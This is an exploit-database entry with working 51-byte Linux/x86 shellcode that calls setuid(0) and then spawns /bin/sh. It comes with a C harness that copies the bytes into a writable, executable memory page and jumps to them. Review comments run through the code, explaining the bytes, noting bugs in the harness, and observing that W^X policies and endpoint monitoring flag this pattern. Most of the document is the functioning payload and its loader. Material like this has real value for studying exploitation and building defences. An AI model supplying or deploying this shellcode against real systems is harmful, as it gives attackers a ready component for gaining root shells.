Linux/x86 setuid(0) then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode 51 bytes



EKU-ID: 5646 CVE: OSVDB-ID:
Author: tesla_ Published: 2016-06-27 Verified: Verified



#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
  
/*
 * Linux/x86: 51 bytes setuid(0) then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode
 *
 * tesla_ (gandung@ppp.cylab.cmu.edu)
 */
/*
 * Raw machine code for the payload described in the header comment above,
 * kept as a C string literal (3 fragments of 18 + 18 + 15 = 51 bytes, matching
 * the size the header states). None of the listed bytes is 0x00, which is what
 * main()'s strlen()-based length computation silently depends on: a payload
 * with an embedded NUL would be copied only up to that byte.
 *
 * NOTE(review): a string literal has type char[], so initialising an
 * `unsigned char *` from it, and later passing it to strlen(), are both
 * pointer-sign mismatches that compilers warn about (-Wpointer-sign).
 * `static const unsigned char shellcode[] = ...` together with
 * `sizeof shellcode - 1` as the length would remove both the warning and the
 * dependence on the absence of NUL bytes.
 */
unsigned char *shellcode = "\x31\xc0\x31\xdb\x53\x8b\x1c\x24\xb0\x17\xcd\x80\x31\xc0\x31\xdb\x50\x50"
                           "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x54\x24\x0c\x8d\x4c\x24\x08"
                           "\x8d\x1c\x24\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
  
/*
 * Test harness: maps one RWX page, copies the payload bytes into it and
 * transfers control to them. The asm template names %eax and the header
 * says Linux/x86, so this is a 32-bit build only (e.g. -m32 on x86_64).
 *
 * NOTE(review): the mmap() result is never checked. On failure it returns
 * MAP_FAILED ((void *)-1) and the memcpy() below would write through that
 * value. A PROT_WRITE|PROT_EXEC anonymous mapping is also exactly what
 * W^X / SELinux execmem policies deny and what endpoint monitoring commonly
 * flags, so an unchecked mmap() is the first thing to look at when the
 * harness crashes instead of running.
 *
 * NOTE(review): the asm input constraint is "r", which lets the compiler
 * place `payload` in any general-purpose register, yet the template
 * hard-codes `%eax`. The call is only correct when register allocation
 * happens to choose eax; the "a" constraint would pin it. No clobber list is
 * declared either, which is harmless only because the payload is not
 * expected to return to C code.
 *
 * Returns 0 only if control ever comes back from the payload.
 */
int main(void) {
        /* regparm(3) would govern a C-level call through this pointer, but
         * the pointer is never called from C (only via inline asm below), so
         * the attribute has no effect on the visible code. */
        void (*payload)(size_t a, size_t b, size_t c)__attribute__((regparm(3)));
  
        /* One page, readable+writable+executable, anonymous (fd -1, offset 0);
         * result unchecked, see note above. The mapping is never unmapped. */
        payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  
        /* Length comes from strlen(): correct only because the literal holds
         * no NUL byte, and the unsigned char * -> const char * conversion
         * draws a sign warning. sizeof on an array would be the robust form. */
        memcpy(payload, shellcode, strlen(shellcode));
  
        /* Indirect call through whatever register the "r" constraint picked;
         * only eax makes the template correct (see note above). */
        __asm__ __volatile__("call      *%%eax"
                             :
                             : "r"(payload));
  
        /* Reached only if the payload returns. */
        return (0);
}